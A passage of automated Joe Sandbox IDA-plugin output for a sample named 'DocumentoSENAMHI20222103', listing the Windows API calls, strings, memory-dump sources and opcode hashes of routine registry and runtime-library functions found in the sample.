                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2383
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD23D5
                                                                              • lstrcmpiA.KERNEL32 ref: 00BD2E26
                                                                              • lstrcmpiA.KERNEL32(?,ForceRemove), ref: 00BD2E3D
                                                                              • RegCloseKey.ADVAPI32(00000000,?), ref: 00BD33DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$lstrcmpi$Close
                                                                              • String ID: Delete$ForceRemove$NoRemove$Val
                                                                              • API String ID: 3752141797-1781481701
                                                                              • Opcode ID: 9d635ddb92bdd3b6cace0447886ee116e4aafd2f8e7b54ec41317235e2af21c7
                                                                              • Instruction ID: 4b0038e45fc00a8fdcc3fe33e867ebea185e090e8e3adcf1bebd5b212e6a4835
                                                                              • Opcode Fuzzy Hash: 9d635ddb92bdd3b6cace0447886ee116e4aafd2f8e7b54ec41317235e2af21c7
                                                                              • Instruction Fuzzy Hash: 55F16271D002699BCB399B159D81BEEF6F4AF45B50F0001DBE609A6342EB348F80CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD235A
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD236A
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2379
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2383
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD23D5
                                                                                • Part of subcall function 00BD21F6: lstrcmpiA.KERNEL32(?,00BE5EBC), ref: 00BD2209
                                                                              • CharNextA.USER32(00000000,?,?,F4668FCD,?,00000000,?,?,?,00BE088D,000000FF,?,00BD3194,?,00000000,?), ref: 00BD25A2
                                                                              • CharNextA.USER32(00000000,?,00BD3194,?,00000000,?,?,?,?,0002001F), ref: 00BD25B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$lstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3586774192-0
                                                                              • Opcode ID: d8544f1941cb55c4253299e6765477c3700957817a8ee0733005a54110b5e45b
                                                                              • Instruction ID: b5b9b3eaea93f45aacd40e501da770479386fd6601755f66620b5915e99bf900
                                                                              • Opcode Fuzzy Hash: d8544f1941cb55c4253299e6765477c3700957817a8ee0733005a54110b5e45b
                                                                              • Instruction Fuzzy Hash: 75D1B671D002A8ABDB259B64CC81AEDF7F4EF68310F1040D7EA49A7351E7749E819FA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: api-ms-$ext-ms-
                                                                              • API String ID: 0-537541572
                                                                              • Opcode ID: 90014067df51c94cc57af78a081f576f3f9e3789160cd9bdce843a359f6cb7af
                                                                              • Instruction ID: 1829e856e7ce3291a5f00e3f54b83ee7e53d543225aa356f397f01deeb788ece
                                                                              • Opcode Fuzzy Hash: 90014067df51c94cc57af78a081f576f3f9e3789160cd9bdce843a359f6cb7af
                                                                              • Instruction Fuzzy Hash: 9B21D871E11211ABCB358F699CC5A5AB7D8DF41764F310693ED1AA7390FB31DD0085D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00BD6F05,?,?,00D1276C,00000000,?,00BD7030,00000004,InitializeCriticalSectionEx,00BE1EB0,InitializeCriticalSectionEx,00000000), ref: 00BD6ED3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3664257935-2084034818
                                                                              • Opcode ID: 367ad43cd44b192a44aa63f9d9442846af60ae2c7b6878810a40ec9dc4e4e6fb
                                                                              • Instruction ID: 9737dccf9534b74401e7c3a30971644d15309c4835b7604ce0e09d51c733a4bd
                                                                              • Opcode Fuzzy Hash: 367ad43cd44b192a44aa63f9d9442846af60ae2c7b6878810a40ec9dc4e4e6fb
                                                                              • Instruction Fuzzy Hash: 1E118A39A41665A7DB218B6CDC81B9AB3E4DF01770F250592EA15EB380FB70ED0086D1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD135A
                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00BD136A
                                                                              • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00BD13AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCreateHandleModuleProc
                                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedA
                                                                              • API String ID: 1964897782-1184998024
                                                                              • Opcode ID: 02b9f1d4d63275924b0b1574c5aaefb9f9cfe02dce669dc204325aa5621d2b5d
                                                                              • Instruction ID: b71edf793630683137cd95dc16d4a7b9836c27269cf166913ec25b1623860edf
                                                                              • Opcode Fuzzy Hash: 02b9f1d4d63275924b0b1574c5aaefb9f9cfe02dce669dc204325aa5621d2b5d
                                                                              • Instruction Fuzzy Hash: F6016731100284BACF310F56DD08C97BEFDEBC9B61710895AFA1595521E771D850E760
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD12F7
                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00BD1307
                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00BD1337
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleOpenProc
                                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                              • API String ID: 1337834000-496252237
                                                                              • Opcode ID: 7b2f776e1461a1252ec32f246a15990bb0e51d3276fa91989c984860db8c48de
                                                                              • Instruction ID: 074f910acd8e05b2c897aec264492ffc77ff2bedad0779f0037bd05a260eaffb
                                                                              • Opcode Fuzzy Hash: 7b2f776e1461a1252ec32f246a15990bb0e51d3276fa91989c984860db8c48de
                                                                              • Instruction Fuzzy Hash: C8F04F32200545FBCF211F9ADC04CABBFAAEF85761750486AF941A2534EB328961EB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,?,00BD339A,?), ref: 00BD15BD
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00BD15CD
                                                                                • Part of subcall function 00BD13BB: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD13CD
                                                                                • Part of subcall function 00BD13BB: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00BD13DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Advapi32.dll$RegDeleteKeyExA
                                                                              • API String ID: 1646373207-1984814126
                                                                              • Opcode ID: 3bde9e66a984c5251d8c683e58693172a1d9fc82b3dc4748a997110e51b46eaf
                                                                              • Instruction ID: 21e478f766f2504e3939aa7510fd81988ad60ba18bd68e527e7785b6fdbfe42e
                                                                              • Opcode Fuzzy Hash: 3bde9e66a984c5251d8c683e58693172a1d9fc82b3dc4748a997110e51b46eaf
                                                                              • Instruction Fuzzy Hash: FB01A734204241FBDB118F59EC80AA5BBE5FB14345F10889BF543D2360EF729561EB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00BD7BC5,?,?,00BD7B8D,?,00000000,?), ref: 00BD7C28
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD7C3B
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00BD7BC5,?,?,00BD7B8D,?,00000000,?), ref: 00BD7C5E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 3784c7adb60a67a3267e837fa921dfee52f23aac84602dccd6431e410cfea061
                                                                              • Instruction ID: 84a7cdfd22ee01e767ce058740174cb8db4b8fd7746c1e2ff15805659a259f38
                                                                              • Opcode Fuzzy Hash: 3784c7adb60a67a3267e837fa921dfee52f23aac84602dccd6431e410cfea061
                                                                              • Instruction Fuzzy Hash: CDF0E230540248FBDB119B54DD09BDDBFB9EB00755F140090EA01E21A0EF308F00EA90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00BD22FE: CharNextA.USER32(?,?,00BD2339,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD231B
                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD235A
                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD236A
                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2379
                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2383
                                                                              • CharNextA.USER32(?,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD23D5
                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD23F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext
                                                                              • String ID:
                                                                              • API String ID: 3213498283-0
                                                                              • Opcode ID: e3d3c91db4da2b81217ccb76b792752435d3d6d291011c4ba6ed5a48ff6ae75c
                                                                              • Instruction ID: 59803233df803c9c8216df9e92521594691154148120f388419c3393d120e0ea
                                                                              • Opcode Fuzzy Hash: e3d3c91db4da2b81217ccb76b792752435d3d6d291011c4ba6ed5a48ff6ae75c
                                                                              • Instruction Fuzzy Hash: EC41D0745042C29FDB268F39C8D46A9FBE4EF29350B2849AED9C5C7306E6749881CB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00BD10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00BE7488), ref: 00BD10CB
                                                                                • Part of subcall function 00BD10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BE7488), ref: 00BD10D5
                                                                              • GetModuleFileNameA.KERNEL32(00BD0000,?,00000104), ref: 00BD3494
                                                                              • GetModuleHandleA.KERNEL32(00000000,?), ref: 00BD3574
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: Module$CriticalErrorFileHandleInitializeLastNameSection
                                                                              • String ID: Module$Module_Raw
                                                                              • API String ID: 3798416324-3885325121
                                                                              • Opcode ID: a54f6f2f9f60ab065ace04fe7a0a329ec3f7d389bfda6d8dcdbf0387ef291c27
                                                                              • Instruction ID: 89296637e8d53c8a04d1797a6d106754fe957eaab1ac8faf8ba74f8f86747d58
                                                                              • Opcode Fuzzy Hash: a54f6f2f9f60ab065ace04fe7a0a329ec3f7d389bfda6d8dcdbf0387ef291c27
                                                                              • Instruction Fuzzy Hash: AB91C472A0562567EB219A649C81BAEF3E89F50B24F1401D7E909A7343FB34DF818F42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00BD10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00BE7488), ref: 00BD10CB
                                                                                • Part of subcall function 00BD10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BE7488), ref: 00BD10D5
                                                                              • GetModuleFileNameA.KERNEL32(00BD0000,?,00000104), ref: 00BD3821
                                                                              • GetModuleHandleA.KERNEL32(00000000,?), ref: 00BD3906
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: Module$CriticalErrorFileHandleInitializeLastNameSection
                                                                              • String ID: Module$Module_Raw
                                                                              • API String ID: 3798416324-3885325121
                                                                              • Opcode ID: 229afa86822f1adf9e2ebcbf3973046fa1742e02c283dd7bcf885e7133298fb2
                                                                              • Instruction ID: 8799fbc71e72b5e83849958ac46dad6a6a1e3b21e6665aee2164dd0a1fb824ab
                                                                              • Opcode Fuzzy Hash: 229afa86822f1adf9e2ebcbf3973046fa1742e02c283dd7bcf885e7133298fb2
                                                                              • Instruction Fuzzy Hash: 93810532A0152957DB219A58D891AEEF3E8AF40B10F1405E7E949A7343FB759F81CF42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD13CD
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00BD13DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Advapi32.dll$RegDeleteKeyTransactedA
                                                                              • API String ID: 1646373207-1972538232
                                                                              • Opcode ID: 1fb9446cf0524377e8c1af361282ff9bff6f08c55e4fc3c336d0e9ed7b7f4668
                                                                              • Instruction ID: d473474db212333138e182965af6204ea37d39967b9eab52a0ccce583c3357cf
                                                                              • Opcode Fuzzy Hash: 1fb9446cf0524377e8c1af361282ff9bff6f08c55e4fc3c336d0e9ed7b7f4668
                                                                              • Instruction Fuzzy Hash: 83F01232210554BA97311EAFDC04DA7F7ECEBC5B63314887BF541D6211EB718452DE61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 00BDD50D
                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BDD757
                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BDD797
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BDD83F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                              • String ID:
                                                                              • API String ID: 2718003287-0
                                                                              • Opcode ID: 7f977f3c53dabb3773047400be029cb78eb2a49fc948ad5b00a276b84d54796b
                                                                              • Instruction ID: 876093b4cec4883b28d24274d6a95b682b7faea92cd350738a93bba5fb335b64
                                                                              • Opcode Fuzzy Hash: 7f977f3c53dabb3773047400be029cb78eb2a49fc948ad5b00a276b84d54796b
                                                                              • Instruction Fuzzy Hash: 19C14A75D002999FCB15CFA8C8809EDFBF5EF49314F2881AAE855BB341E6319D46CB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BD64DB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: EncodePointer
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 2118026453-2084237596
